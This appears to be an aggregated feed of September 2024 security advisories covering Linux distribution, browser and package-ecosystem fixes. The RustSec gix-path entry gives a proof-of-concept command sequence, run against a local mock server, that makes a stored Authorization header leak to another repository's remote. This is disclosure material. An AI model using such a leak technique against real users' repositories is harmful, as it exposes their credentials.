- Backport upstream patch to fix TypeError for http connection if the PoolManager is instantiated with server_hostname
Resolves: RHEL-49853
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-6162

03.09.2024 03:00:00 | oraclelinux | [ELSA-2024-6163] python3.9 security update (moderate)
[3.9.18-3.5]
- Security fix for CVE-2024-8088
Resolves: RHEL-55968
[3.9.18-3.4]
- Security fix for CVE-2024-6923
Resolves: RHEL-53044
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-6163

03.09.2024 03:00:00 | oraclelinux | [ELSA-2024-6166] krb5 security update (moderate)
[1.21.1-2.0.1]
- Fixed race condition in krb5_set_password() [Orabug: 33609767]
[1.21.1-2]
- CVE-2024-37370 CVE-2024-37371 Fix vulnerabilities in GSS message token handling
  Resolves: RHEL-45401 RHEL-45390
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-6166

03.09.2024 03:00:00 | oraclelinux | [ELSA-2024-6179] python3.11 security update (moderate)
[3.11.7-1.5]
- Security fix for CVE-2024-8088
Resolves: RHEL-55960
[3.11.7-1.4]
- Security fix for CVE-2024-6923
Resolves: RHEL-53037
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-6179

03.09.2024 03:00:00 | oraclelinux | [ELSA-2024-6184] orc security update (moderate)
[0.4.31-7]
- Add patch for CVE-2024-40897
- Resolves: RHEL-50701
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-6184

03.09.2024 03:00:00 | oraclelinux | [ELSA-2024-6186] containernetworking-plugins security update (moderate)
[1:1.4.0-5]
- rebuild for CVE-2024-24783
- Resolves: RHEL-28431
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-6186

03.09.2024 03:00:00 | oraclelinux | [ELSA-2024-6187] gvisor-tap-vsock security update (moderate)
[6:0.7.3-5]
- rebuild for CVE-2024-24783
- Resolves: RHEL-28435
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-6187

03.09.2024 03:00:00 | oraclelinux | [ELSA-2024-6188] runc security update (moderate)
[4:1.1.12-4]
- rebuild for CVE-2024-24783
- Resolves: RHEL-28439
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-6188

03.09.2024 03:00:00 | oraclelinux | [ELSA-2024-6189] buildah security update (moderate)
[1.33.7-4.0.1]
- Drop nmap-ncat requirement and skip ignore-socket test case [Orabug: 34117178]
[2:1.33.7-4]
- rebuild for CVE-2024-24783
- Resolves: RHEL-28428
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-6189

03.09.2024 03:00:00 | oraclelinux | [ELSA-2024-6192] wget security update (moderate)
[1.21.1-8]
- Resolves: RHEL-43226 - Misinterpretation of input may lead to improper behavior
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-6192

03.09.2024 03:00:00 | oraclelinux | [ELSA-2024-6195] skopeo security update (moderate)
[2:1.14.5-1]
- update to the latest content of https://github.com/containers/skopeo/tree/release-1.14 (https://github.com/containers/skopeo/commit/072072b)
- Resolves: RHEL-40805
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-6195

03.09.2024 03:00:00 | oraclelinux | [ELSA-2024-6197] ghostscript security update (moderate)
[9.54.0-17]
- RHEL-44759 CVE-2024-33870 ghostscript: path traversal to arbitrary files if the current directory is in the permitted paths
- RHEL-44745 CVE-2024-33869 ghostscript: path traversal and command execution due to path reduction
- RHEL-44731 CVE-2024-29510 ghostscript: format string injection leads to shell command execution (SAFER bypass)
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-6197

03.09.2024 03:00:00 | redhat | [RHSA-2024:6148] nodejs:18 security update (moderate)
Node.js is a software development platform for building fast and scalable network applications in the JavaScript programming language.

Security Fix(es):
* node-tar: denial of service while parsing a tar file due to lack of folders depth validation (CVE-2024-28863)
* nodejs: Bypass network import restriction via data URL (CVE-2024-22020)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:6148

03.09.2024 03:00:00 | redhat | [RHSA-2024:6147] nodejs:18 security update (moderate)
Node.js is a software development platform for building fast and scalable network applications in the JavaScript programming language.

Security Fix(es):
* node-tar: denial of service while parsing a tar file due to lack of folders depth validation (CVE-2024-28863)
* nodejs: Bypass network import restriction via data URL (CVE-2024-22020)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:6147

03.09.2024 03:00:00 | redhat | [RHSA-2024:6162] python-urllib3 security update (moderate)
The python-urllib3 package provides the Python HTTP module with connection pooling and file POST abilities.

Security Fix(es):
* urllib3: proxy-authorization request header is not stripped during cross-origin redirects (CVE-2024-37891)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:6162

03.09.2024 03:00:00 | redhat | [RHSA-2024:6163] python3.9 security update (moderate)
Python is an interpreted, interactive, object-oriented programming language, which includes modules, classes, exceptions, very high level dynamic data types and dynamic typing. Python supports interfaces to many system calls and libraries, as well as to various windowing systems.

Security Fix(es):
* cpython: python: email module doesn't properly quote newlines in email headers, allowing header injection (CVE-2024-6923)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:6163

03.09.2024 03:00:00 | redhat | [RHSA-2024:6166] krb5 security update (moderate)
Kerberos is a network authentication system, which can improve the security of your network by eliminating the insecure practice of sending passwords over the network in unencrypted form. It allows clients and servers to authenticate to each other with the help of a trusted third party, the Kerberos key distribution center (KDC).

Security Fix(es):
* krb5: GSS message token handling (CVE-2024-37371)
* krb5: GSS message token handling (CVE-2024-37370)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:6166

03.09.2024 03:00:00 | redhat | [RHSA-2024:6179] python3.11 security update (moderate)
Python is an interpreted, interactive, object-oriented programming language, which includes modules, classes, exceptions, very high level dynamic data types and dynamic typing. Python supports interfaces to many system calls and libraries, as well as to various windowing systems.

Security Fix(es):
* cpython: python: email module doesn't properly quote newlines in email headers, allowing header injection (CVE-2024-6923)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:6179

03.09.2024 03:00:00 | redhat | [RHSA-2024:6184] orc security update (moderate)
Orc is a library and set of tools for compiling and executing very simple programs that operate on arrays of data. The "language" is a generic assembly language that represents many of the features available in SIMD architectures, including saturated addition and subtraction, and many arithmetic operations.

Security Fix(es):
* orc: Stack-based buffer overflow vulnerability in ORC (CVE-2024-40897)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:6184

03.09.2024 03:00:00 | redhat | [RHSA-2024:6187] gvisor-tap-vsock security update (moderate)
A replacement for libslirp and VPNKit, written in pure Go. It is based on the network stack of gVisor and is used to provide networking for podman-machine virtual machines. Compared to libslirp, gvisor-tap-vsock brings a configurable DNS server and dynamic port forwarding.

Security Fix(es):
* golang: crypto/x509: Verify panics on certificates with an unknown public key algorithm (CVE-2024-24783)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:6187

03.09.2024 03:00:00 | redhat | [RHSA-2024:6188] runc security update (moderate)
The runC tool is a lightweight, portable implementation of the Open Container Format (OCF) that provides container runtime.

Security Fix(es):
* golang: crypto/x509: Verify panics on certificates with an unknown public key algorithm (CVE-2024-24783)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:6188

03.09.2024 03:00:00 | redhat | [RHSA-2024:6192] wget security update (moderate)
The wget packages provide the GNU Wget file retrieval utility for HTTP, HTTPS, and FTP protocols.

Security Fix(es):
* wget: Misinterpretation of input may lead to improper behavior (CVE-2024-38428)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:6192

03.09.2024 03:00:00 | redhat | [RHSA-2024:6195] skopeo security update (moderate)
The skopeo command lets you inspect images from container image registries, get images and image layers, and use signatures to create and verify files.

Security Fix(es):
* golang: crypto/x509: Verify panics on certificates with an unknown public key algorithm (CVE-2024-24783)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:6195

03.09.2024 03:00:00 | redhat | [RHSA-2024:6242] kpatch-patch-5_14_0-427_13_1 and kpatch-patch-5_14_0-427_31_1 security update (important)
This is a kernel live patch module which can be loaded by the kpatch command line utility to modify the code of a running kernel. This patch module is targeted for kernel-5.14.0-427.13.1.el9_4.

Security Fix(es):
* kernel: virtio-net: tap: mlx5_core short frame denial of service (CVE-2024-41090)
* kernel: virtio-net: tun: mlx5_core short frame denial of service (CVE-2024-41091)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:6242

03.09.2024 03:00:00 | mozilla | [MFSA-2024-40] Security Vulnerabilities fixed in Firefox ESR 128.2 (high)
- CVE-2024-8381: Type confusion when looking up a property name in a "with" block (high)
  A potentially exploitable type confusion could be triggered when looking up a property name on an object being used as the `with` environment.
- CVE-2024-8382: Internal event interfaces were exposed to web content when browser EventHandler listener callbacks ran (moderate)
  Internal browser event interfaces were exposed to web content when privileged EventHandler listener callbacks ran for those events. Web content that tried to use those interfaces would not be able to use them with elevated privileges, but their presence would indicate certain browser features had been used, such as when a user opened the Dev Tools console.
- CVE-2024-8383: Firefox did not ask before opening news: links in an external application (moderate)
  Firefox normally asks for confirmation before asking the operating system to find an application to handle a scheme that the browser does not support. It did not ask before doing so for the Usenet-related schemes news: and snews:. Since most operating systems don't have a trusted newsreader installed by default, an unscrupulous program that the user downloaded could register itself as a handler. The website that served the application download could then launch that application at will.
- CVE-2024-8384: Garbage collection could mis-color cross-compartment objects in OOM conditions (moderate)
  The JavaScript garbage collector could mis-color cross-compartment objects if OOM conditions were detected at the right point between two passes. This could have led to memory corruption.
- CVE-2024-8385: WASM type confusion involving ArrayTypes (high)
  A difference in the handling of StructFields and ArrayTypes in WASM could be used to trigger an exploitable type confusion vulnerability.
- CVE-2024-8386: SelectElements could be shown over another site if popups are allowed (low)
  If a site had been granted the permission to open popup windows, it could cause Select elements to appear on top of another site to perform a spoofing attack.
- CVE-2024-8387: Memory safety bugs fixed in Firefox 130, Firefox ESR 128.2, and Thunderbird 128.2 (high)
  Memory safety bugs present in Firefox 129, Firefox ESR 128.1, and Thunderbird 128.1. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.
https://secdb.nttzen.cloud/security-advisory/mozilla/MFSA-2024-40

03.09.2024 03:00:00 | mozilla | [MFSA-2024-39] Security Vulnerabilities fixed in Firefox 130 (high)
- CVE-2024-8381: Type confusion when looking up a property name in a "with" block (high)
  A potentially exploitable type confusion could be triggered when looking up a property name on an object being used as the `with` environment.
- CVE-2024-8382: Internal event interfaces were exposed to web content when browser EventHandler listener callbacks ran (moderate)
  Internal browser event interfaces were exposed to web content when privileged EventHandler listener callbacks ran for those events. Web content that tried to use those interfaces would not be able to use them with elevated privileges, but their presence would indicate certain browser features had been used, such as when a user opened the Dev Tools console.
- CVE-2024-8383: Firefox did not ask before opening news: links in an external application (moderate)
  Firefox normally asks for confirmation before asking the operating system to find an application to handle a scheme that the browser does not support. It did not ask before doing so for the Usenet-related schemes news: and snews:. Since most operating systems don't have a trusted newsreader installed by default, an unscrupulous program that the user downloaded could register itself as a handler. The website that served the application download could then launch that application at will.
- CVE-2024-8384: Garbage collection could mis-color cross-compartment objects in OOM conditions (moderate)
  The JavaScript garbage collector could mis-color cross-compartment objects if OOM conditions were detected at the right point between two passes. This could have led to memory corruption.
- CVE-2024-8385: WASM type confusion involving ArrayTypes (high)
  A difference in the handling of StructFields and ArrayTypes in WASM could be used to trigger an exploitable type confusion vulnerability.
- CVE-2024-8386: SelectElements could be shown over another site if popups are allowed (low)
  If a site had been granted the permission to open popup windows, it could cause Select elements to appear on top of another site to perform a spoofing attack.
- CVE-2024-8387: Memory safety bugs fixed in Firefox 130, Firefox ESR 128.2, and Thunderbird 128.2 (high)
  Memory safety bugs present in Firefox 129, Firefox ESR 128.1, and Thunderbird 128.1. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.
- CVE-2024-8388: Fullscreen notice on Android could be hidden under various panels and OS prompts (moderate)
  Multiple prompts and panels from both Firefox and the Android OS could be used to obscure the notification announcing the transition to fullscreen mode after the fix for CVE-2023-6870 in Firefox 121. This could lead to spoofing the browser UI if the sudden appearance of the prompt distracted the user from noticing the visual transition happening behind the prompt. These notifications now use the Android Toast feature. *This bug only affects Firefox on Android. Other operating systems are unaffected.*
- CVE-2024-8389: Memory safety bugs fixed in Firefox 130 (high)
  Memory safety bugs present in Firefox 129. Some of these bugs showed evidence of memory corruption and we presume that with enough effort some of these could have been exploited to run arbitrary code.
https://secdb.nttzen.cloud/security-advisory/mozilla/MFSA-2024-39

03.09.2024 03:00:00mozilla[MFSA-2024-41] Security Vulnerabilities fixed in Firefox ESR 115.15 (high)
- CVE-2024-8381: Type confusion when looking up a property name in a "with" block (high). A potentially exploitable type confusion could be triggered when looking up a property name on an object being used as the `with` environment.
- CVE-2024-8382: Internal event interfaces were exposed to web content when browser EventHandler listener callbacks ran (moderate). Internal browser event interfaces were exposed to web content when privileged EventHandler listener callbacks ran for those events. Web content that tried to use those interfaces would not be able to use them with elevated privileges, but their presence would indicate certain browser features had been used, such as when a user opened the Dev Tools console.
- CVE-2024-8383: Firefox did not ask before opening news: links in an external application (moderate). Firefox normally asks for confirmation before asking the operating system to find an application to handle a scheme that the browser does not support. It did not ask before doing so for the Usenet-related schemes news: and snews:. Since most operating systems don't have a trusted newsreader installed by default, an unscrupulous program that the user downloaded could register itself as a handler. The website that served the application download could then launch that application at will.
- CVE-2024-8384: Garbage collection could mis-color cross-compartment objects in OOM conditions (moderate). The JavaScript garbage collector could mis-color cross-compartment objects if OOM conditions were detected at the right point between two passes. This could have led to memory corruption.
https://secdb.nttzen.cloud/security-advisory/mozilla/MFSA-2024-41
03.09.2024 03:00:00oraclelinux[ELSA-2024-6194] podman security update (important)
[4.9.4-10.0.1]
- Fixes issue of podman execvp error while using podmansh [Orabug: 36073625]
- Improved saving remote build context to tarfile in Podman daemon [Orabug: 36495655]
- Add devices on container startup, not on creation
- Backport fast gzip for compression [Orabug: 36420418]
- overlay: Put should ignore ENINVAL for Unmount [Orabug: 36234694]
- Drop nmap-ncat requirement and skip ignore-socket test case [Orabug: 34117404]
[4:4.9.4-10]
- update to the latest content of https://github.com/containers/podman/tree/v4.9-rhel (https://github.com/containers/podman/commit/6b45bb1)
- Resolves: RHEL-53250
[4:4.9.4-9]
- update to the latest content of https://github.com/containers/podman/tree/v4.9-rhel (https://github.com/containers/podman/commit/1a2d8e3)
- Resolves: RHEL-50507
[4:4.9.4-8]
- update to the latest content of https://github.com/containers/podman/tree/v4.9-rhel (https://github.com/containers/podman/commit/affa589)
- Resolves: RHEL-45916
[4:4.9.4-7]
- update to the latest content of https://github.com/containers/podman/tree/v4.9-rhel (https://github.com/containers/podman/commit/8fa0c76)
- Resolves: RHEL-40804
https://secdb.nttzen.cloud/security-advisory/oraclelinux/ELSA-2024-6194
03.09.2024 03:00:00redhat[RHSA-2024:6146] python3.12 security update (moderate)
Python 3.12 is an accessible, high-level, dynamically typed, interpreted programming language, designed with an emphasis on code readability. It includes an extensive standard library, and has a vast ecosystem of third-party libraries. The python3.12 package provides the "python3.12" executable: the reference interpreter for the Python language, version 3. The majority of its standard library is provided in the python3.12-libs package, which should be installed automatically along with python3.12. The remaining parts of the Python standard library are broken out into the python3.12-tkinter and python3.12-test packages, which may need to be installed separately. Documentation for Python is provided in the python3.12-docs package. Packages containing additional libraries for Python are generally named with the "python3.12-" prefix.
Security Fix(es):
* cpython: python: email module doesn't properly quote newlines in email headers, allowing header injection (CVE-2024-6923)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:6146
03.09.2024 03:00:00redhat[RHSA-2024:6186] containernetworking-plugins security update (moderate)
The Container Network Interface (CNI) project consists of a specification and libraries for writing plug-ins for configuring network interfaces in Linux containers, along with a number of supported plug-ins. CNI concerns itself only with network connectivity of containers and removing allocated resources when the container is deleted.
Security Fix(es):
* golang: crypto/x509: Verify panics on certificates with an unknown public key algorithm (CVE-2024-24783)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:6186
03.09.2024 03:00:00redhat[RHSA-2024:6189] buildah security update (moderate)
The buildah package provides a tool for facilitating building OCI container images. Among other things, buildah enables you to: Create a working container, either from scratch or using an image as a starting point; Create an image, either from a working container or using the instructions in a Dockerfile; Build both Docker and OCI images.
Security Fix(es):
* golang: crypto/x509: Verify panics on certificates with an unknown public key algorithm (CVE-2024-24783)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:6189
03.09.2024 03:00:00redhat[RHSA-2024:6194] podman security update (important)
The podman tool manages pods, container images, and containers. It is part of the libpod library, which is for applications that use container pods. Container pods is a concept in Kubernetes.
Security Fix(es):
* golang: crypto/x509: Verify panics on certificates with an unknown public key algorithm (CVE-2024-24783)
* go-retryablehttp: url might write sensitive information to log file (CVE-2024-6104)
* gorilla/schema: Potential memory exhaustion attack due to sparse slice deserialization (CVE-2024-37298)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:6194
03.09.2024 03:00:00redhat[RHSA-2024:6197] ghostscript security update (moderate)
The Ghostscript suite contains utilities for rendering PostScript and PDF documents. Ghostscript translates PostScript code to common bitmap formats so that the code can be displayed or printed.
Security Fix(es):
* ghostscript: format string injection leads to shell command execution (SAFER bypass) (CVE-2024-29510)
* ghostscript: path traversal and command execution due to path reduction (CVE-2024-33869)
* ghostscript: path traversal to arbitrary files if the current directory is in the permitted paths (CVE-2024-33870)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
https://secdb.nttzen.cloud/security-advisory/redhat/RHSA-2024:6197
04.09.2024 00:03:10npm[NPM:GHSA-RW72-V6C7-HF9R] ReDoS in urlregex (moderate)A vulnerability was found in nescalante urlregex up to 0.5.0 and classified as problematic. This issue affects some unknown processing of the file index.js of the component Backtracking. The manipulation leads to inefficient regular expression complexity. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 0.5.1 is able to address this issue. The identifier of the patch is e5a085afe6abfaea1d1a78f54c45af9ef43ca1f9. It is recommended to upgrade the affected component.https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-RW72-V6C7-HF9R
03.09.2024 03:00:00freebsd[FREEBSD:26125E09-69CA-11EF-8A0F-A8A1599412C6] chromium -- multiple security fixes
Chrome Releases reports: This update includes 4 security fixes:
- [357391257] High CVE-2024-8362: Use after free in WebAudio. Reported by Cassidy Kim(@cassidy6564) on 2024-08-05
- [358485426] High CVE-2024-7970: Out of bounds write in V8. Reported by Cassidy Kim(@cassidy6564) on 2024-08-09
https://secdb.nttzen.cloud/security-advisory/freebsd/FREEBSD:26125E09-69CA-11EF-8A0F-A8A1599412C6
03.09.2024 23:17:07maven[MAVEN:GHSA-H83P-72JV-G7VP] Missing hostname validation in Kroxylicious (high)A flaw was found in Kroxylicious. When establishing the connection with the upstream Kafka server using a TLS secured connection, Kroxylicious fails to properly verify the server's hostname, resulting in an insecure connection. For a successful attack to be performed, the attacker needs to perform a Man-in-the-Middle attack or compromise any external systems, such as DNS or network routing configuration. This issue is considered a high complexity attack, with additional high privileges required, as the attack would need access to the Kroxylicious configuration or a peer system. The result of a successful attack impacts both data integrity and confidentiality.https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-H83P-72JV-G7VP
04.09.2024 01:23:51rustsec[RUSTSEC-2024-0367] gix-path uses local config across repos when it is the highest scope

### Summary

`gix-path` executes `git` to find the path of a configuration file that belongs to the `git` installation itself, but mistakenly treats the local repository's configuration as system-wide if no higher scoped configuration is found. In rare cases, this causes a less trusted repository to be treated as more trusted, or leaks sensitive information from one repository to another, such as sending credentials to another repository's remote.

### Details

In `gix_path::env`, the underlying implementation of the `installation_config` and `installation_config_prefix` functions calls `git config -l --show-origin` and parses the first line of the output to extract the path to the configuration file holding the configuration variable of highest [scope](https://git-scm.com/docs/git-config#SCOPES):

<https://github.com/Byron/gitoxide/blob/12251eb052df30105538fa831e641eea557f13d8/gix-path/src/env/git/mod.rs#L91>
<https://github.com/Byron/gitoxide/blob/12251eb052df30105538fa831e641eea557f13d8/gix-path/src/env/git/mod.rs#L112>

While the configuration variable of highest scope is not usually in the local scope, there are practical situations where this occurs:

- A configuration file truly associated with the installation is not present on all systems and can occasionally be empty. Likewise, there may be no variables in the global scope.
- Configuration files associated with those higher scopes may be deliberately skipped by setting the `GIT_CONFIG_SYSTEM` and `GIT_CONFIG_GLOBAL` environment variables to `/dev/null` (or to `NUL` on Windows). This prevents `gix-path` from finding the path of configuration files for those scopes, while not preventing downstream components such as the function in `gix-config` from reporting a local path as being associated with the installation.
- The `GIT_CONFIG_NOSYSTEM` environment variable can be used to disable configuration associated with the installation. (`GIT_CONFIG_NOSYSTEM=1` is more powerful than `GIT_CONFIG_SYSTEM=/dev/null` on systems where an additional "unknown" scope is associated with the installation, as occurs on macOS with Apple Git.) This will cause the local scope to be the highest nonempty scope under even more situations, though in practice it is less dangerous because most, though possibly not all, downstream components would disregard the value.

A user may use either or both of the latter two techniques to turn off an undesired configuration or to create a more replicable environment. Such a user would expect that this results in a more controlled configuration.

Often, when located inside one repository, a user performs operations on that repository or that are not specific to any repository. In such use, local configuration is typically desired or at least acceptable, and mistaking it as coming from another scope is not typically harmful.

However, sometimes a user is in one repository and operates on another repository. A major case where this occurs is cloning one repository while located in another. This can be done in an ad-hoc fashion, including when cloning the repository outside of the one we are inside. It may also potentially be automated by an application for purposes such as submodule handling.

Two kinds of problems are anticipated:

- A less secure configuration may be set for a specific repository where it is judged acceptable, even though it would not be wanted for other repositories, such as to enable a protocol or set up debugging.
- More likely, a configuration that supplies secrets for use in one repository's remote can be used to send those secrets to another repository's remote.

### PoC

In this example, we send mock `Authorization: Basic ...` credentials meant for one repository's remote to another remote, by running `gix` while inside the first repository to clone the second repository.

These instructions are written for a Unix shell, but they will work in other shells, including in PowerShell on Windows if the method of setting environment variables is adapted and `/dev/null` is replaced with `NUL`. This procedure is likely to demonstrate the problem on all systems *except* macOS. This is due to the high-scoped "unknown" configuration that usually accompanies Apple Git, and reflects that gix-path is in practice much less vulnerable on macOS (though still potentially vulnerable).

1. Install [`dummyhttp`](https://crates.io/crates/dummyhttp) to serve as a local HTTP server for the demonstration.
2. Obtain a build of `gitoxide` with the `max` feature set enabled. While this vulnerability affects other builds, this example requires `max` for `http.extraHeader` support. Running `cargo install gitoxide` will install such a build though it may build against a patched version of `gix-path`. Cloning the repository ([`12251eb`](https://github.com/Byron/gitoxide/commit/12251eb052df30105538fa831e641eea557f13d8) and earlier are affected) and building with `cargo build` or `cargo install --path .` are also sufficient. In contrast, installing from published binaries with `binstall` or `quickinstall` does not provide the `max` feature, as of this writing.
3. Run: `dummyhttp -i 127.0.0.1 -c 403 -v`
4. In a separate terminal, create a new local repository and set up a mock remote and `http.extraHeader` configuration:
   ```sh
   git init myrepo
   cd myrepo
   git remote add origin http://127.0.0.1:8080/mygit.git
   git config --local http.extraHeader 'Authorization: Basic abcde'
   ```
5. Make sure the testing setup is working by running `gix fetch` in the repository and checking that it fails in the expected way. In the terminal where that is run, a message should be shown indicating an HTTP 403 error. The more interesting output is in the terminal where `dummyhttp` is running, which should look like this:
   ```text
   2024-30-30 03:30:16 127.0.0.1:55689 GET /myrepo.git/info/refs?service=git-upload-pack HTTP/1.1
   ┌─Incoming request
   │ GET /myrepo.git/info/refs?service=git-upload-pack HTTP/1.1
   │ Accept: */*
   │ Authorization: Basic abcde
   │ Git-Protocol: version=2
   │ Host: 127.0.0.1:8080
   │ User-Agent: git/oxide-0.42.2
   ┌─Outgoing response
   │ HTTP/1.1 403 Forbidden
   │ Content-Length: 9
   │ Content-Type: text/plain; charset=utf-8
   │ Date: Fri, 30 Aug 2024 03:30:16 -0400
   ```
   Some details may differ, especially dates and times. But `Authorization: Basic abcde` should be shown.
6. Now, in the terminal where you ran `gix fetch`, try cloning a separate repository:
   ```sh
   gix clone http://127.0.0.1:8080/other.git
   ```
   Check the output appended in the terminal where `dummyhttp` is running. This is to observe that `Authorization: Basic abcde` was rightly *not* sent. Alternatively, if it *does* appear, then your system may be in one of the uncommon configurations that is vulnerable without further action.
7. Now rerun that command, but with a modified environment, to cause `gix-path` to wrongly treat configuration from the local scope as being associated with the `git` installation:
   ```sh
   env GIT_CONFIG_SYSTEM=/dev/null GIT_CONFIG_GLOBAL=/dev/null gix clone http://127.0.0.1:8080/other.git
   ```
   Check the output appended in the terminal where `dummyhttp` is running. Observe that `Authorization: Basic abcde` was wrongly sent.

While this procedure uses the same remote host for both repositories, this is not a required element. If the second repository had a different, untrusted host, the extra header would still be sent.

### Impact

It is believed to be very difficult to exploit this vulnerability deliberately, due to the need either to anticipate a situation in which higher-scoped configuration variables would be absent, or to arrange for this to happen. Although any operating system may be affected, users running Apple Git on macOS are much less likely to be affected.

In the example shown above, more secure general practices would avoid it: using a credential manager, or even using `http.<url>.extraHeader` with as specific a `<url>` as possible, rather than the more general `http.extraHeader`. Many scenarios are analogous: if each repository's configuration is as secure as possible for how the repository is used, and secrets are stored securely and separately, then the circumstances under which an unacceptably insecure configuration is used, or under which a leak of credentials would occur, become unlikely.
https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0367
05.09.2024 02:40:07slackware[SSA:2024-248-01] expat
New expat packages are available for Slackware 15.0 and -current to fix security issues.
**Here are the details from the Slackware 15.0 ChangeLog**
```
patches/packages/expat-2.6.3-i586-1_slack15.0.txz: Upgraded.
  This update addresses security issues with impact ranging from denial of
  service to potentially arbitrary code execution.
  For more information, see:
    https://www.cve.org/CVERecord?id=CVE-2024-45490
    https://www.cve.org/CVERecord?id=CVE-2024-45491
    https://www.cve.org/CVERecord?id=CVE-2024-45492
  (* Security fix *)
```
**Where to find the new packages**
Thanks to the friendly folks at the OSU Open Source Lab (http://osuosl.org) for donating FTP and rsync hosting to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for additional mirror sites near you.
Updated package for Slackware 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware-15.0/patches/packages/expat-2.6.3-i586-1_slack15.0.txz
Updated package for Slackware x86_64 15.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-15.0/patches/packages/expat-2.6.3-x86_64-1_slack15.0.txz
Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/l/expat-2.6.3-i686-1.txz
Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/l/expat-2.6.3-x86_64-1.txz
**MD5 signatures**
Slackware 15.0 package:
ddb1a7ead2840c9fa32479c1fc53e359  expat-2.6.3-i586-1_slack15.0.txz
Slackware x86_64 15.0 package:
59f2208decfd70f127562debc6eafe29  expat-2.6.3-x86_64-1_slack15.0.txz
Slackware -current package:
b5e98e9d838fde938ff61f5bf38c4428  l/expat-2.6.3-i686-1.txz
Slackware x86_64 -current package:
e61bc71c8ce229ed30afe158cc2f45b0  l/expat-2.6.3-x86_64-1.txz
**Installation instructions**
Upgrade the package as root:
`# upgradepkg expat-2.6.3-i586-1_slack15.0.txz`
https://secdb.nttzen.cloud/security-advisory/slackware/SSA:2024-248-01
04.09.2024 23:32:20maven[MAVEN:GHSA-G76F-GJFX-4RPR] Vertx gRPC server does not limit the maximum message size (moderate)In Eclipse Vert.x version 4.3.0 to 4.5.9, the gRPC server does not limit the maximum length of message payload (Maven GAV: io.vertx:vertx-grpc-server and io.vertx:vertx-grpc-client). This is fixed in the 4.5.10 version. Note this does not affect the Vert.x gRPC server based grpc-java and Netty libraries (Maven GAV: io.vertx:vertx-grpc)https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-G76F-GJFX-4RPR
